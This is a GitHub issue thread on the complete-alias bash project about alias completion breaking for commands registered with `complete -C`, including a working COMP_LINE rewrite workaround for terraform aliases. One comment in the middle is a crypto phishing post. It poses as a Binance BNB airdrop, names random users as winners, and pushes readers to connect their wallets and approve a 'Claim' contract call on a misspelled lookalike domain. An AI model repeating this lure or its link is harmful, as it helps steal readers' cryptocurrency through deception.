### ISSUE TITLE
Difficulty with `complete -C` commands

### ISSUE THREAD

**Issue by mbenson** [cykerway/complete-alias#30]
I use certain utility packages to manage multiple versions of a given utility. One such is `tfenv` to manage Terraform. This sets up my `PATH` such that the executable file named `terraform` is symlinked to a script that invokes the appropriate actual instance. Command completion works without issue. I would like to set up an alias, e.g.:
`alias tfinit='terraform init ... $@'`
but I find that this gives me errors like:
`-bash: compgen: warning: -C option may not work as you expect`

Is this possible? What can I do to help complete-alias DWIM?

Thanks,
Matt

**Comment by cykerway** [comment]
Several points:

1. You didn't report your bash version. Run `bash --version` to see if it's 4.4 or higher.
2. Support for Mac is experimental. It'd be great if you can reproduce the bug on a Linux system.
3. I wonder if you have pasted the alias body literally, since I don't expect `$@` in an alias body.

**Comment by cykerway** [comment]
I don't think this has anything to do with symlinks. I think the problem happens because of `complete -C`. The function `_command_offset` from `bash-completion` does not handle such commands perfectly.

**Comment by mrpanday93** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @ralphchristianeclipse, @kassayAkos, @satoshiware, @pedromarins, @lubibo, @lihnux, @asdwsxzc123

**Comment by zzJinux** [comment]
Workaround: `alias tf=terraform; complete -C /path/to/terraform tf` works.

**Comment by zzJinux** [comment]
I had a similar issue when I tried to alias `terraform` to `tf`. I found a workaround:

```
alias tf=terraform
complete -C /path/to/terraform tf
```

In your case, it's a little more complicated:

```
alias tfinit='terraform init'
complete -C 'COMP_LINE="terraform init${COMP_LINE:6}" COMP_POINT=$((COMP_POINT+8)) terraform' tfinit
# 6 == len('tfinit')
# 8 == len('terraform init') - len('tfinit')
```

The key is to trick `terraform` into thinking it's completing `terraform init blah blah`.

**Comment by heidemn-faro** [comment]
I had a similiar issue with Terragrunt, unfortunately wasn't able to solve it yet.
This didn't work for me:
`complete -C /usr/local/bin/terragrunt tg`
For some reason, `tg <TAB>` does not complete any commands, but `tg -<TAB>` successfully completes the options.
I tried this with `~/.local/bin/tg` being either a symlink or hard-link to `/usr/local/bin/terragrunt`.

When I tried an alias + complete-alias first, I also got the warning ` -C option may not work as you expect`.
